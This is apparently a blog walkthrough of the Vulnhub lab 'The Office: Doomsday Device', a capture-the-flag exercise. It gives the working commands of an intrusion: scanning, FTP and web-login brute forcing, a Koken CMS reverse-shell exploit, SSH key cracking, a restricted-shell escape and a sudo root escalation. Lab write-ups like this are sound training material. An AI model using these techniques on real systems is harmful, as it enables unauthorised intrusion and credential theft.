The Office: Doomsday Device Walkthrough

The Office: Doomsday Device is a Vulnhub machine based on the US version of the British mockumentary “The Office”. There are 8 flags on the machine altogether that we need to find. “The Office: Doomsday Device Walkthrough”.

Link to the machine: https://www.vulnhub.com/entry/the-office-doomsday-device,627/

Funbox Walkthrough – Vulnhub – Writeup

Identify the target machine

Firstly, I identified the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

Scan open ports

Next, I scanned open ports on the target machine so that I would get the knowledge of the exposed services.

nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.63

Here, we see three web services and one FTP service. Likewise, we also see a filtered port 22.

Enumerate port 80

The default page didn’t give me anything.

However, the source contained a base64 encoded text at the end of the page.

The decoded text gave us morse code which we can decode using Cyber Chef.

Here, we got the first flag.

Bruteforce directory

For the next flag, I enumerated the directory on port 80.

gobuster dir -u http://10.0.2.63 -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o dir-80.log

I found a path that had a Wireshark packet capture file and a text file.

And, I also downloaded the capture file. From the note above, the one who smells like death refers to Creed. Similarly, it also says that he has a weak password. Upon opening the capture file, we see the FTP password of the user creed.

But it didn’t allow me to log in. Meanwhile, we get another path in the gobuster scan.

On that path, we see a document.

The document has the third flag (ours second). Also, the document says that Creed has added a three-digit number at the end of the password. So, I wrote a python script to create a wordlist.

with open("wordlist.txt", "w") as file:
    for i in range(1000):
        file.write(f"creed{i:03}\n")

After I ran the python script, I got a wordlist “wordlist.txt” as follows.

Then, I did the bruteforce once again.

hydra -l creed -P wordlist.txt 10.0.2.63 ftp
lftp -u creed,creed223 10.0.2.63

On the reminder file, we see a hint for the next step. Upon searching the internet for a reference with the same line, we redirect to season 7 episode 9. And, there is a reference to the password which I have snipped below.

So, the password of the zip is “bigboobz”.

The files had a note and an encrypted SSH private key.

Here, the note said that the private key belongs to angela and the passphrase is one of her cats’ names. I checked the names from the link below.

https://theoffice.fandom.com/wiki/Angela%27s_cats

However, we saw in the Nmap scan results that the SSH port is filtered. Therefore, we have to unlock the port. In most of the case, we see the use of the binary knock for this purpose.

Enumerate port 18888

On the website, we see a reference to angela once again. Next, I scanned the directories.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://10.0.2.63:18888/FUZZ" -of html -o dir-18888.html -fs 0

On the admin page, we see a login form as follows.

I fired up burp suite for bruteforcing the password. Since we know the email is “angela@dundermifflin.com”, and the password is one of her cats, we can use Burp Suite intruder. In the intruder, I set the position as follows.

And, I manually added the cats’ names from the fandom page.

Lastly, I started the attack.

The cat Crinklepuss redirected and the length is different from others. So, we got the password.

The settings of the Koken CMS revealed the version of it. This version suffers from the following exploit.

https://www.exploit-db.com/exploits/48706

I followed the instructions to get the reverse shell. I listened on port 9001.

nc -nlvp 9001

Finally, I got access to a shell.

Next, I improved the shell using the following link.

Upgrade to an intelligent reverse shell

Unlock the filtered port

On the /var/www/html directory, there is a hint directory.

Inside the directory, we have an index.html file.

It asked us to find the difference between the images. Thus, I downloaded the images to my machine.

wget http://10.0.2.63/_hint_/knockknock1.jpg
wget http://10.0.2.63/_hint_/knockknock2.jpg
wget http://10.0.2.63/_hint_/knockknock3.jpg

After I downloaded the images, I looked at the exiftags of all images. Luckily, I got something on the second image.

exiftool knockknock2.jpg

Using the numbers 5000, 7000 and 9000, we can unlock the ssh port.

knock 10.0.2.63 5000 7000 9000

After doing the above command, I ran Nmap scan on port 22.

nmap -v -T4 -sC -sV -p22 10.0.2.63

Getting SSH shell access

Previously, we had found an encrypted SSH private key named michael. So, we can guess that that belongs to the same user. Thus, I moved forward to cracking the passphrase of it. Also, I had downloaded ssh2john.py for python3 into the home directory of my machine.

python3 ~/ssh2john.py michael | tee michael-hash

Next, I cracked the hash using the file “rockyou.txt”.

john michael-hash --wordlist=/home/kali/rockyou.txt

It gave us the passphrase. So, I changed the permissions of the private key and logged into the SSH service.

chmod 600 michael
ssh michael@10.0.2.63 -i michael

The shell is a restricted bash. So, I overcame the restrictions as follows.

python3 -c 'import pty;pty.spawn("/bin/bash")'

We got the next flag on the directory.

Find unexplored flags

On the /var/www/html2/secret directory, we got one missed flag.

When I checked the sudo permissions, I found out that the user can execute some scripts as all users.

sudo -l

But before this, let’s get another flag that is situated in MySQL server.

cat /var/www/koken/storage/configuration/database.php

Using these configurations, we can log into the database server.

mysql -ukokenuser -p -D kokendb

That table contained our fifth flag. So, we got all of the first 7 flags. Since we only have one flag left, we can proceed towards root privilege escalation.

Coming back to the sudo permissions, we don’t see any files inside creed’s home directory starting with “defuse”.

However, we can log into the FTP server using creed’s credentials and try executing it as root. I created a file “defuse.sh” on my local machine with the following content.

#!/bin/bash
bash -i

However, I couldn’t make it executable. So, I checked the permissions on the configuration file /etc/vsftpd.conf.

Since it’s editable by everyone, we can enable the chmod command.

Now, we have to restart the service which we don’t have access to. Therefore, I had to restart the virtual machine. Next, I had to unlock the service once again. Similarly, I had to log in as michael and overcome the restricted bash.

And, I didn’t get any errors while changing the permissions in the FTP client.

Then, I executed the script as the user root.

sudo -u root /home/creed/defuse.sh

Finally, I got the last flag.

Leave a comment